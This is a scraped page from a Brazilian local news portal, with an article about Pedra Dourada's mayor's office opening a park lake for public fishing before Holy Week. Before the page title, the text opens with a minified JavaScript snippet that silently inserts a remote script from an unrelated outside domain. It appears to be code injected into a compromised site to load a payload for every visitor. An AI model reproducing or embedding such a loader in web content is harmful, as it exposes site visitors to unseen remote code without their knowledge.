;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Peixe na mesa, lazer: Prefeitura de Pedra Dourada libera a pescaria no lago do Parque São João - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Peixe na mesa, lazer: Prefeitura de Pedra Dourada libera a pescaria no lago do Parque São João

AÇÃO ACONTECE TODA SEMANA SANTA, TRADIÇÃO DE DÉCADAS. 500 KG DE PEIXES FORAM SOLTOS NO LAGO. “Comer peixe na Semana Santa faz parte da tradição e da devoção cristã e está relacionada a uma forma de praticar o jejum e a abstinência. O peixe está presente em muitos lugares da Bíblia com um simbolismo profundo na tradição cristã. Ele é um símbolo que representa a vida, fertilidade e abundância”.

Foi pensando nessas tradições e religiosidade que a Prefeitura de Pedra Dourada, através da Secretaria Municipal de Agricultura, teve a iniciativa de inserir também neste meio, o social e o lazer. Para tanto, disponibilizou para toda a população na semana que antecede a Semana Santa a “Pescaria Liberada” no lago do charmoso Parque São João.

O prefeito Fagner também presente

Durante a semana moradores e também visitantes tem a permissão de fazer a pescaria em um ambiente com mais de 500 kg de peixes e soltos. “Aqui as famílias se reúnem e se divertem durante todo o dia e boa parte da noite. É um momento de lazer e entretenimento e a oportunidade de ter peixe na mesa na Semana Santa. Precisamos manter a tradição, pois há anos que vem este costume.

Me recordo bem, de quando adolescente, vinha com meu pai pescar e a diversão era garantida, tanto que é um dos meus esportes preferidos. Todas as famílias estão convidadas a participar desse evento, um momento de confraternização e união” destacou o secretário de Agricultura e Meio Ambiente, Altair Lino.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.